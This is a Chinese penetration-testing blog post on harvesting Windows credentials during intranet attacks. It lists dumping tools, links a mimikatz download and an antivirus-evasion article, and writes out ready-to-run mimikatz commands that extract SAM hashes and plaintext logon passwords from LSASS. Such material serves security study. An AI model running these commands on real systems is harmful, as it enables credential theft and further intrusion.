当前位置:网站首页>内网渗透之内网信息收集(五)

内网渗透之内网信息收集(五)

2022-07-06 09:22:00 不知名白帽

凭证信息收集

01凭证获取工具

常用来获取windows密码的工具

  1. mimikatz
  2. wce
  3. pwddump7
  4. ophcrack
  5. procdump+mimikatz
  6. lazagne

02密码hash

LM哈希&NTLM型哈希

winodws hash:

2000

xp

2003

Vista

win7

2008

2012

LM

NTLM

windows本地hash:

http://www.secpulse.com/archives/65256.html

windows系统下hash密码格式:

用户名称:RID:LM-HASH值:NT-HASH值

03mimikatz

mimikatz下载:

链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg

提取码:jryu

非本地交互式凭证获取

mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

一般都是通过远程登陆靶机,在靶机内下载mimikatz

log result.txt(将结果传到txt中)

 

 

privilege::debug(提权)

 

token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)

获取到system用户的token

lsadump::sam(获得用户哈希)

sekurlsa::logonpasswords(获取明文密码)

 

mimikatz1.x版本:

privilege::debug //提升权限

inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里

@getLogonPasswords //获取密码

mimikatz免杀:

https://www.freebuf.com/articles/system/234365.html

04get-hashs

 

原网站

版权声明
本文为[不知名白帽]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_63127854/article/details/125627076